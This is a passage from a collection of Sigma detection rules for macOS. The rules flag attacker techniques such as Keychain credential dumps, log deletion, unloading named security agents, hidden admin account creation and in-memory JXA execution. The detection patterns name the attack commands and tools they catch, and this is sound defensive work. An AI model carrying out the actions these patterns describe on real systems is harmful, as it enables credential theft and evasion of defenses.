- https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
author: Alejandro Ortuno, oscd.community
date: 2020-10-14
modified: 2024-08-11
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1037.005
logsource:
category: file_event
product: macos
detection:
selection:
TargetFilename|startswith:
- '/Library/StartupItems/'
- '/System/Library/StartupItems'
TargetFilename|endswith: '.plist'
condition: selection
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_applescript.yml
================================================
title: MacOS Scripting Interpreter AppleScript
id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55
status: test
description: Detects execution of AppleScript of the macOS scripting language AppleScript.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md
- https://redcanary.com/blog/applescript/
author: Alejandro Ortuno, oscd.community
date: 2020-10-21
modified: 2023-02-01
tags:
- attack.execution
- attack.t1059.002
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/osascript'
CommandLine|contains:
- ' -e '
- '.scpt'
- '.js'
condition: selection
falsepositives:
- Application installers might contain scripts as part of the installation process.
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_base64_decode.yml
================================================
title: Decode Base64 Encoded Text -MacOs
id: 719c22d7-c11a-4f2c-93a6-2cfdd5412f68
status: test
description: Detects usage of base64 utility to decode arbitrary base64-encoded text
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2022-11-26
tags:
- attack.defense-evasion
- attack.t1027
logsource:
category: process_creation
product: macos
detection:
selection:
Image: '/usr/bin/base64'
CommandLine|contains: '-d'
condition: selection
falsepositives:
- Legitimate activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_binary_padding.yml
================================================
title: Binary Padding - MacOS
id: 95361ce5-c891-4b0a-87ca-e24607884a96
status: test
description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
- https://linux.die.net/man/1/truncate
- https://linux.die.net/man/1/dd
author: 'Igor Fits, Mikhail Larin, oscd.community'
date: 2020-10-19
modified: 2023-02-17
tags:
- attack.defense-evasion
- attack.t1027.001
logsource:
product: macos
category: process_creation
detection:
selection_truncate:
Image|endswith: '/truncate'
CommandLine|contains: '-s +'
selection_dd:
Image|endswith: '/dd'
CommandLine|contains:
- 'if=/dev/zero' # if input is not /dev/zero, then there is no null padding
- 'if=/dev/random' # high-quality random data
- 'if=/dev/urandom' # low-quality random data
condition: 1 of selection_*
falsepositives:
- Legitimate script work
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml
================================================
title: File Time Attribute Change
id: 88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0
status: test
description: Detect file time attribute change to hide new or changes to existing files
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
author: Igor Fits, Mikhail Larin, oscd.community
date: 2020-10-19
modified: 2022-01-12
tags:
- attack.defense-evasion
- attack.t1070.006
logsource:
product: macos
category: process_creation
detection:
selection:
Image|endswith: '/touch'
CommandLine|contains:
- '-t'
- '-acmr'
- '-d'
- '-r'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml
================================================
title: Hidden Flag Set On File/Directory Via Chflags - MacOS
id: 3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe
status: test
description: |
Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS.
When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
references:
- https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/
- https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf
- https://ss64.com/mac/chflags.html
author: Omar Khaled (@beacon_exe)
date: 2024-08-21
tags:
- attack.defense-evasion
- attack.credential-access
- attack.command-and-control
- attack.t1218
- attack.t1564.004
- attack.t1552.001
- attack.t1105
logsource:
product: macos
category: process_creation
detection:
selection:
Image|endswith: '/chflags'
CommandLine|contains: 'hidden '
condition: selection
falsepositives:
- Legitimate usage of chflags by administrators and users.
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml
================================================
title: Indicator Removal on Host - Clear Mac System Logs
id: acf61bd8-d814-4272-81f0-a7a269aa69aa
status: test
description: Detects deletion of local audit logs
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
author: remotephone, oscd.community
date: 2020-10-11
modified: 2022-09-16
tags:
- attack.defense-evasion
- attack.t1070.002
logsource:
product: macos
category: process_creation
detection:
selection1:
Image|endswith:
- '/rm'
- '/unlink'
- '/shred'
selection_cli_1:
CommandLine|contains: '/var/log'
selection_cli_2:
CommandLine|contains|all:
- '/Users/'
- '/Library/Logs/'
condition: selection1 and 1 of selection_cli*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml
================================================
title: Clipboard Data Collection Via OSAScript
id: 7794fa3c-edea-4cff-bec7-267dd4770fd7
related:
- id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55
type: derived
status: test
description: Detects possible collection of data from the clipboard via execution of the osascript binary
references:
- https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
author: Sohan G (D4rkCiph3r)
date: 2023-01-31
tags:
- attack.collection
- attack.execution
- attack.t1115
- attack.t1059.002
logsource:
product: macos
category: process_creation
detection:
selection:
CommandLine|contains|all:
- 'osascript'
- ' -e '
- 'clipboard'
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_create_account.yml
================================================
title: Creation Of A Local User Account
id: 51719bf5-e4fd-4e44-8ba8-b830e7ac0731
status: test
description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md
- https://ss64.com/osx/sysadminctl.html
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2023-02-18
tags:
- attack.t1136.001
- attack.persistence
logsource:
category: process_creation
product: macos
detection:
selection_dscl:
Image|endswith: '/dscl'
CommandLine|contains: 'create'
selection_sysadminctl:
Image|endswith: '/sysadminctl'
CommandLine|contains: 'addUser'
condition: 1 of selection_*
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml
================================================
title: Hidden User Creation
id: b22a5b36-2431-493a-8be1-0bae56c28ef3
status: test
description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-10
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.t1564.002
logsource:
category: process_creation
product: macos
detection:
dscl_create:
Image|endswith: '/dscl'
CommandLine|contains: 'create'
id_below_500:
CommandLine|contains: UniqueID
CommandLine|re: '([0-9]|[1-9][0-9]|[1-4][0-9]{2})'
ishidden_option_declaration:
CommandLine|contains: 'IsHidden'
ishidden_option_confirmation:
CommandLine|contains:
- 'true'
- 'yes'
- '1'
condition: dscl_create and id_below_500 or dscl_create and (ishidden_option_declaration and ishidden_option_confirmation)
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml
================================================
title: Credentials from Password Stores - Keychain
id: b120b587-a4c2-4b94-875d-99c9807d6955
status: test
description: Detects passwords dumps from Keychain
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md
- https://gist.github.com/Capybara/6228955
author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
date: 2020-10-19
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1555.001
logsource:
category: process_creation
product: macos
detection:
selection1:
Image: '/usr/bin/security'
CommandLine|contains:
- 'find-certificate'
- ' export '
selection2:
CommandLine|contains:
- ' dump-keychain '
- ' login-keychain '
condition: 1 of selection*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml
================================================
title: System Integrity Protection (SIP) Disabled
id: 3603f18a-ec15-43a1-9af2-d196c8a7fec6
status: test
description: |
Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
references:
- https://ss64.com/osx/csrutil.html
- https://objective-see.org/blog/blog_0x6D.html
- https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/
- https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-01-02
tags:
- attack.discovery
- attack.t1518.001
logsource:
product: macos
category: process_creation
detection:
# VT Query: behavior_processes:"csrutil status" p:5+ type:mac
selection:
Image|endswith: '/csrutil'
CommandLine|contains: 'disable'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_csrutil_status.yml
================================================
title: System Integrity Protection (SIP) Enumeration
id: 53821412-17b0-4147-ade0-14faae67d54b
status: test
description: |
Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
references:
- https://ss64.com/osx/csrutil.html
- https://objective-see.org/blog/blog_0x6D.html
- https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/
- https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-01-02
tags:
- attack.discovery
- attack.t1518.001
logsource:
product: macos
category: process_creation
detection:
# VT Query: behavior_processes:"csrutil status" p:5+ type:mac
selection:
Image|endswith: '/csrutil'
CommandLine|contains: 'status'
condition: selection
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml
================================================
title: Disable Security Tools
id: ff39f1a6-84ac-476f-a1af-37fcdf53d7c0
status: test
description: Detects disabling security tools
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
category: process_creation
product: macos
detection:
launchctl_unload:
Image: '/bin/launchctl'
CommandLine|contains: 'unload'
security_plists:
CommandLine|contains:
- 'com.objective-see.lulu.plist' # Objective-See firewall management utility
- 'com.objective-see.blockblock.plist' # Objective-See persistence locations watcher/blocker
- 'com.google.santad.plist' # google santa
- 'com.carbonblack.defense.daemon.plist' # carbon black
- 'com.carbonblack.daemon.plist' # carbon black
- 'at.obdev.littlesnitchd.plist' # Objective Development Software firewall management utility
- 'com.tenablesecurity.nessusagent.plist' # Tenable Nessus
- 'com.opendns.osx.RoamingClientConfigUpdater.plist' # OpenDNS Umbrella
- 'com.crowdstrike.falcond.plist' # Crowdstrike Falcon
- 'com.crowdstrike.userdaemon.plist' # Crowdstrike Falcon
- 'osquery' # facebook osquery
- 'filebeat' # elastic log file shipper
- 'auditbeat' # elastic auditing agent/log shipper
- 'packetbeat' # elastic network logger/shipper
- 'td-agent' # fluentd log shipper
disable_gatekeeper:
Image: '/usr/sbin/spctl'
CommandLine|contains: 'disable'
condition: (launchctl_unload and security_plists) or disable_gatekeeper
falsepositives:
- Legitimate activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml
================================================
title: User Added To Admin Group Via Dscl
id: b743623c-2776-40e0-87b1-682b975d0ca5
related:
- id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b
type: obsolete
status: test
description: Detects attempts to create and add an account to the admin group via "dscl"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos
- https://ss64.com/osx/dscl.html
author: Sohan G (D4rkCiph3r)
date: 2023-03-19
tags:
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.privilege-escalation
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection: # adds to admin group
Image|endswith: '/dscl'
CommandLine|contains|all:
- ' -append '
- ' /Groups/admin '
- ' GroupMembership '
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml
================================================
title: User Added To Admin Group Via DseditGroup
id: 5d0fdb62-f225-42fb-8402-3dfe64da468a
status: test
description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos
- https://ss64.com/osx/dseditgroup.html
author: Sohan G (D4rkCiph3r)
date: 2023-08-22
tags:
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.privilege-escalation
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/dseditgroup'
CommandLine|contains|all:
- ' -o edit ' # edit operation
- ' -a ' # username
- ' -t user'
- 'admin' # Group name
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml
================================================
title: Root Account Enable Via Dsenableroot
id: 821bcf4d-46c7-4b87-bc57-9509d3ba7c11
status: test
description: Detects attempts to enable the root account via "dsenableroot"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md
- https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml
- https://ss64.com/osx/dsenableroot.html
author: Sohan G (D4rkCiph3r)
date: 2023-08-22
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1078
- attack.t1078.001
- attack.t1078.003
- attack.initial-access
- attack.persistence
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/dsenableroot'
filter_main_disable:
CommandLine|contains: ' -d '
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml
================================================
title: File and Directory Discovery - MacOS
id: 089dbdf6-b960-4bcc-90e3-ffc3480c20f6
status: test
description: Detects usage of system utilities to discover files and directories
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2022-11-25
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: macos
detection:
select_file_with_asterisk:
Image: '/usr/bin/file'
CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline
select_recursive_ls:
Image: '/bin/ls'
CommandLine|contains: '-R'
select_find_execution:
Image: '/usr/bin/find'
select_mdfind_execution:
Image: '/usr/bin/mdfind'
select_tree_execution|endswith:
Image: '/tree'
condition: 1 of select*
falsepositives:
- Legitimate activities
level: informational
================================================
FILE: rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml
================================================
title: Credentials In Files
id: 53b1b378-9b06-4992-b972-dde6e423d2b4
status: test
description: Detecting attempts to extract passwords with grep and laZagne
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
author: 'Igor Fits, Mikhail Larin, oscd.community'
date: 2020-10-19
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1552.001
logsource:
product: macos
category: process_creation
detection:
selection1:
Image|endswith: '/grep'
CommandLine|contains: 'password'
selection2:
CommandLine|contains: 'laZagne'
condition: 1 of selection*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml
================================================
title: GUI Input Capture - macOS
id: 60f1ce20-484e-41bd-85f4-ac4afec2c541
status: test
description: Detects attempts to use system dialog prompts to capture user credentials
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md
- https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/
author: remotephone, oscd.community
date: 2020-10-13
modified: 2025-12-05
tags:
- attack.collection
- attack.credential-access
- attack.t1056.002
logsource:
product: macos
category: process_creation
detection:
selection_img:
Image|endswith: '/osascript'
selection_cli_1:
CommandLine|contains|all:
- '-e'
- 'display'
- 'dialog'
- 'answer'
selection_cli_2:
CommandLine|contains:
- 'admin'
- 'administrator'
- 'authenticate'
- 'authentication'
- 'credentials'
- 'pass'
- 'password'
- 'unlock'
condition: all of selection_*
falsepositives:
- Legitimate administration tools and activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml
================================================
title: Disk Image Creation Via Hdiutil - MacOS
id: 1cf98dc2-fcb0-47c9-8aea-654c9284d1ae
status: test
description: Detects the execution of the hdiutil utility in order to create a disk image.
references:
- https://www.loobins.io/binaries/hdiutil/
- https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/
- https://ss64.com/mac/hdiutil.html
author: Omar Khaled (@beacon_exe)
date: 2024-08-10
tags:
- attack.exfiltration
logsource:
product: macos
category: process_creation
detection:
selection:
Image|endswith: /hdiutil
CommandLine|contains: 'create'
condition: selection
falsepositives:
- Legitimate usage of hdiutil by administrators and users.
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml
================================================
title: Disk Image Mounting Via Hdiutil - MacOS
id: bf241472-f014-4f01-a869-96f99330ca8c
status: test
description: Detects the execution of the hdiutil utility in order to mount disk images.
references:
- https://www.loobins.io/binaries/hdiutil/
- https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/
- https://ss64.com/mac/hdiutil.html
author: Omar Khaled (@beacon_exe)
date: 2024-08-10
tags:
- attack.initial-access
- attack.collection
- attack.t1566.001
- attack.t1560.001
logsource:
product: macos
category: process_creation
detection:
selection:
Image|endswith: /hdiutil
CommandLine|contains:
- 'attach '
- 'mount '
condition: selection
falsepositives:
- Legitimate usage of hdiutil by administrators and users.
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml
================================================
title: Suspicious Installer Package Child Process
id: e0cfaecd-602d-41af-988d-f6ccebb2af26
status: test
description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
references:
- https://redcanary.com/blog/clipping-silver-sparrows-wings/
- https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml
author: Sohan G (D4rkCiph3r)
date: 2023-02-18
tags:
- attack.t1059
- attack.t1059.007
- attack.t1071
- attack.t1071.001
- attack.execution
- attack.command-and-control
logsource:
category: process_creation
product: macos
detection:
selection_installer:
ParentImage|endswith:
- '/package_script_service'
- '/installer'
Image|endswith:
- '/sh'
- '/bash'
- '/dash'
- '/python'
- '/ruby'
- '/perl'
- '/php'
- '/javascript'
- '/osascript'
- '/tclsh'
- '/curl'
- '/wget'
CommandLine|contains:
- 'preinstall'
- 'postinstall'
condition: selection_installer
falsepositives:
- Legitimate software uses the scripts (preinstall, postinstall)
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml
================================================
title: System Information Discovery Using Ioreg
id: 2d5e7a8b-f484-4a24-945d-7f0efd52eab0
status: test
description: |
Detects the use of "ioreg" which will show I/O Kit registry information.
This process is used for system information discovery.
It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
references:
- https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior
- https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior
- https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior
- https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-12-20
modified: 2024-01-02
tags:
- attack.discovery
- attack.t1082
logsource:
product: macos
category: process_creation
detection:
# Examples:
# /bin/bash /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l
# /usr/sbin/ioreg ioreg -rd1 -w0 -c AppleAHCIDiskDriver
# /bin/bash /bin/sh -c ioreg -l | grep -e 'USB Vendor Name'
# ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, \"\\\"\"); printf(\"%s\", line[4]); }
selection_img:
- Image|endswith: '/ioreg'
- CommandLine|contains: 'ioreg'
selection_cmd1:
CommandLine|contains:
- '-l'
- '-c'
selection_cmd2:
CommandLine|contains:
- 'AppleAHCIDiskDriver'
- 'IOPlatformExpertDevice'
- 'Oracle'
- 'Parallels'
- 'USB Vendor Name'
- 'VirtualBox'
- 'VMware'
condition: all of selection_*
falsepositives:
- Legitimate administrative activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml
================================================
title: JAMF MDM Potential Suspicious Child Process
id: 2316929c-01aa-438c-970f-099145ab1ee6
status: test
description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.
references:
- https://github.com/MythicAgents/typhon/
- https://www.zoocoup.org/casper/jamf_cheatsheet.pdf
- https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-08-22
tags:
- attack.execution
logsource:
category: process_creation
product: macos
detection:
selection:
ParentImage|endswith: '/jamf'
Image|endswith:
# Note: Add additional binaries/commands that are uncommon during your typical admin usage of Jamf
- '/bash'
- '/sh'
condition: selection
falsepositives:
- Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_jamf_usage.yml
================================================
title: JAMF MDM Execution
id: be2e3a5c-9cc7-4d02-842a-68e9cb26ec49
status: test
description: |
Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
references:
- https://github.com/MythicAgents/typhon/
- https://www.zoocoup.org/casper/jamf_cheatsheet.pdf
- https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html
author: Jay Pandit
date: 2023-08-22
tags:
- attack.execution
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/jamf'
CommandLine|contains:
# Note: add or remove commands according to your policy
- 'createAccount'
- 'manage'
- 'removeFramework'
- 'removeMdmProfile'
- 'resetPassword'
- 'setComputerName'
condition: selection
falsepositives:
- Legitimate use of the JAMF CLI tool by IT support and administrators
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml
================================================
title: JXA In-memory Execution Via OSAScript
id: f1408a58-0e94-4165-b80a-da9f96cf6fc3
related:
- id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55
type: derived
status: test
description: Detects possible malicious execution of JXA in-memory via OSAScript
references:
- https://redcanary.com/blog/applescript/
author: Sohan G (D4rkCiph3r)
date: 2023-01-31
tags:
- attack.t1059.002
- attack.t1059.007
- attack.execution
logsource:
product: macos
category: process_creation
detection:
selection_main:
CommandLine|contains|all:
- 'osascript'
- ' -e '
- 'eval'
- 'NSData.dataWithContentsOfURL'
selection_js:
- CommandLine|contains|all:
- ' -l '
- 'JavaScript'
- CommandLine|contains: '.js'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml
================================================
title: Launch Agent/Daemon Execution Via Launchctl
id: ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e
status: test
description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md
- https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/
- https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html
- https://www.loobins.io/binaries/launchctl/
author: Pratinav Chandra
date: 2024-05-13
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1569.001
- attack.t1543.001
- attack.t1543.004
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/launchctl'
CommandLine|contains:
- 'submit'
- 'load'
- 'start'
condition: selection
falsepositives:
- Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious.
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_local_account.yml
================================================
title: Local System Accounts Discovery - MacOs
id: ddf36b67-e872-4507-ab2e-46bda21b842c
status: test
description: Detects enumeration of local systeam accounts on MacOS
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-08
modified: 2022-11-27
tags:
- attack.discovery
- attack.t1087.001
logsource:
category: process_creation
product: macos
detection:
selection_1:
Image|endswith: '/dscl'
CommandLine|contains|all:
- 'list'
- '/users'
selection_2:
Image|endswith: '/dscacheutil'
CommandLine|contains|all:
- '-q'
- 'user'
selection_3:
CommandLine|contains: '''x:0:'''
selection_4:
Image|endswith: '/cat'
CommandLine|contains:
- '/etc/passwd'
- '/etc/sudoers'
selection_5:
Image|endswith: '/id'
selection_6:
Image|endswith: '/lsof'
CommandLine|contains: '-u'
condition: 1 of selection*
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_local_groups.yml
================================================
title: Local Groups Discovery - MacOs
id: 89bb1f97-c7b9-40e8-b52b-7d6afbd67276
status: test
description: Detects enumeration of local system groups
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
author: Ömer Günal, Alejandro Ortuno, oscd.community
date: 2020-10-11
modified: 2022-11-27
tags:
- attack.discovery
- attack.t1069.001
logsource:
category: process_creation
product: macos
detection:
selection_1:
Image|endswith: '/dscacheutil'
CommandLine|contains|all:
- '-q'
- 'group'
selection_2:
Image|endswith: '/cat'
CommandLine|contains: '/etc/group'
selection_3:
Image|endswith: '/dscl'
CommandLine|contains|all:
- '-list'
- '/groups'
condition: 1 of selection*
falsepositives:
- Legitimate administration activities
level: informational
================================================
FILE: rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml
================================================
title: MacOS Network Service Scanning
id: 84bae5d4-b518-4ae0-b331-6d4afd34d00f
status: test
description: Detects enumeration of local or remote network services.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-21
modified: 2021-11-27
tags:
- attack.discovery
- attack.t1046
logsource:
category: process_creation
product: macos
detection:
selection_1:
Image|endswith:
- '/nc'
- '/netcat'
selection_2:
Image|endswith:
- '/nmap'
- '/telnet'
filter:
CommandLine|contains: 'l'
condition: (selection_1 and not filter) or selection_2
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_network_sniffing.yml
================================================
title: Network Sniffing - MacOs
id: adc9bcc4-c39c-4f6b-a711-1884017bf043
status: test
description: |
Detects the usage of tooling to sniff network traffic.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-14
modified: 2022-11-26
tags:
- attack.discovery
- attack.credential-access
- attack.t1040
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith:
- '/tcpdump'
- '/tshark'
condition: selection
falsepositives:
- Legitimate administration activities
level: informational
================================================
